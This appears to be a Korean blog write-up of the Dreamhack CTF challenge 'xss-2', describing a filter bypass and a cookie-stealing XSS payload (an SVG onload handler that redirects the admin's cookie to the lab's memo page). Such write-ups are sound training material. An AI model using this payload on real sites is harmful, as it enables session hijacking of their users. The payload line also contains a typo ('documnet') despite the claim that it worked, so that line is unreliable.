웹 해킹 stage 3과 stage4를 수강하였다. cookie & session파트의 문제는 다 풀었길래 stage 4 xss의 문제를 풀어보았다.
xxs-2 write up
문제 파일을 열어보자 다음과 같은 try-catch 문에 flag.txt 파일을 열고 읽어오는 명령문이 있었다.
다시 웹페이지로 가서 vuln(xss)page로 들어가보았다. 에러 알림이 뜨도록 xss공격을 실행해보았다.
아무런 일도 일어나지 않았다.
우회해서 xss공격을 실행하자 먹히는 것을 확인할 수 있었다.
xss 우회를 이용하여 memo 페이지에 관리자의 쿠키 값을 넘기면 될 것 같다.
다음과 같이 우회한 쿼리문을을 제출하였다.
<svg/onload=location["href"]="http://127.0.0.1:8000/memo?memo="+documnet["cookie"]>
good 팝업창이 떴다!
memo페이지에 들어가자 다음과 같이 플래그가 뜬 것을 확인할 수 있었다.
'CTF 문제 풀이' 카테고리의 다른 글
[Dreamhack] Mango write up (0) | 2023.05.17 |
---|---|
[Dreamhack] CRSF-2 write up (0) | 2023.05.08 |
[Dreamhack] CSRF-1 wirte up (0) | 2023.05.08 |
[Dreamhack] Web Hacking Introduction ~ Background-web (0) | 2023.05.02 |